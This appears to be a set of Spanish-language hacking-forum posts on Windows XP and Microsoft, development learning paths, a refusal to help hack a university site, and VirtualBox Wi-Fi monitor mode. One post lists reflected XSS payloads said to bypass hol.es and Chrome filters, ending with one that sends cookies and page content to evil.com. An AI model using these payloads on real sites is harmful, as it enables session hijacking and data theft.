Y la otra mitad? realmente habrá sido un problema del sistema operativo?, no se porque me huele a que la empresa Proofpoint tiene algo que ver con Microsoft ya sea en lo legal o en lo comercial.

No quiero decir que windows xp sea un sistema seguro pero parece que Microsoft está intentando hecharle mas tierra encima de la que realmente existe para que la gente termine comprando el nuevo sistema operativo.

De todas maneras a las empresas se les sigue ofreciendo soporte para windows xp de manera interna asi que de que se quejan, las actualizaciones aun existen.

De hecho en el portal de la universidad de Chile dicen:

http://radio.uchile.cl/2014/08/19/lobby-de-microsoft-a-diputado-farcas-evidencia-vulnerabilidad-de-los-politicos

Debería trabajar de adivino.

El sitio web está desactualizado, ya lo dijeron por twitter, que pronto van a actualizar la plataforma.


No se porqué no me extrañaría que apareciera algo similar, siempre han tildado la palabra hacker con un delincuente informático y no por error sino apropósito en la lucha en contra del software libre, a favor el dinero y del poder.

Porfin!!!!!

Parches?, no hace falta, basta con quitar las funcionalidades de malware de la NSA que tiene el sistema operativo para mejorar la seguridad contra el ciberespionaje.

Talves lo que quisieron decir es mejorar el ciberespionaje para que otros no puedan usar sus backdoors en contra de ellos mismos.

Buscas algo así?

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img onerror="a=alert;a('XSS by WHK')" src="x

El ids (sistema de detección de intrusos) de hol.es es bastante malo, usan listas negras bastantes pobres, puedes bbypasear los filtros de muchas maneras. Bypasear el filtro de google chrome es un poco mas difícil pero también tiene sus formas de hacerlo.

Edito:

Aqui tienes un XSS que bypasea el filtro de hol.es y el de Google Chrome 38.0 y funciona en todos los navegadores a la fecha con o sin filtro:

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror="a=alert;a(0911)

Realmente crees que los filtros son suficientes para detener un ataque?, yo creo que no.

Acá hay otro XSS compatible con hol.es y google chrome:

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=alert;a(location.hash.substr(1))#XSS by WHK

Acá un XSS mas peligroso compatible con todos los navegadores con filtros anti xss y hosteado en hol.es:

http://pruebasdephp.hol.es/XSS_test.php?name=x"><img src="x" onerror=";a=eval;a(location.hash.substr(1))#document.location="http://evil.com/?recibe=" + escape(document.cookie) + ': ' + escape(document.body.innerHTML);

Saludos.

Exacto, y agregale esto:

Boilerplate > Bootstrap > Java > Grails > Desarrollo de aplicaciones para android (nativo) > Desarrollo de aplicaciones para android (cordova) > otros lenguajes como PHP y Python.

Si aprendes cordova antes de nativo vas a tener problemas con las malas costumbres al programar, por eso es mejor aprender nativo y despues en cordova (phonegap).

Mira, acá hay algo claro... o te ayudamos a hackear una pagina de una universidad o te enseñamos a usar nikto y lo que estoy pensando es que quieres que te ayudemos a hackear la página cosa que en este foro no está permitido.

Mira, si te interesa el mundo del hacking a nivel web no estaría mal que nos preguntaras por ejemplo:
"Que es el clickjacking y que tiene que ver X-Frame-Options?"

Entonces nosotros te podriamos explicar que es un clickjacking y que importancia tiene el uso de iframes en este caso, pero no se si realmente te interese aprender ya que nos muestras una ensalada de tipos de vulnerabilidades y solo quieres que te enseñemos a apretar un botón para joder esa web que escaneaste y como que no es la idea.

Te recomiendo que te pases por las reglas del foro, leas un poco, hagas el intento de querer aprender, googlees un poco y si tienes alguna duda específica vuelvas y hagas tu pregunta nuevamente para evitar que algún moderador o administrador termine eliminando o baneando tu cuenta.

Saludos.

Debes configurar tu tarjeta de red virtual en modo puente, normalmente está en modo NAT pero debes ponerle puente, esto hará que tu sistema virtual haga uso de tu dispositivo físico de manera directa sin pasar por un dispositivo virtual como normalmente se hace.

Ahora, aparte de esto abajo de la opción de tipo de red debe aparecer la opción de permitir o denegar poner el dispositivo de red en modo monitor, por defecto viene deshabilitado, debes habilitarlo.

Con esto tu sistema virtual podrá hacer uso directo de tu dispositivo físico sin afectar el funcionamiento del sistema operativo huésped ya que (no me preguntes como lo hace) es posible realizar el uso del dispositivo físico mas de una ves de manera paralela sin afectar el uno al otro, de hecho hace un tiempo atrás pude conectar dos veces un módem a la conexión telefónica obteniendo dos ips simultaneas con diferentes marcados tanto en el sistema operativo huésped como en el virtual y utilizando el adaptador en modo puente. Con el dispositivo de Wifi (wlan) es lo mismo, puedes hacer conexiones paralelas utilizando el mismo dispositivo físico.

Ahora, no se si funciona de la misma manera para poner en modo monitor la tarjeta inalámbrica mientras que en el huésped no, talves puede ser el motivo del porqué no esté funcionando porque la tarjeta no soporte esta modalidad de manera paralela durante diferentes conexiones, en ese caso intenta poner la tarjeta de red inalámbrica en modo monitor desde el sistema huésped y luego hacer uso de ella en el sistema virtual de la misma manera, talves funcione, talves no, pero puede ser una idea porque realmente nunca lo he intentado pero tengo entendido que de una u otra manera si se puede.

Saludos.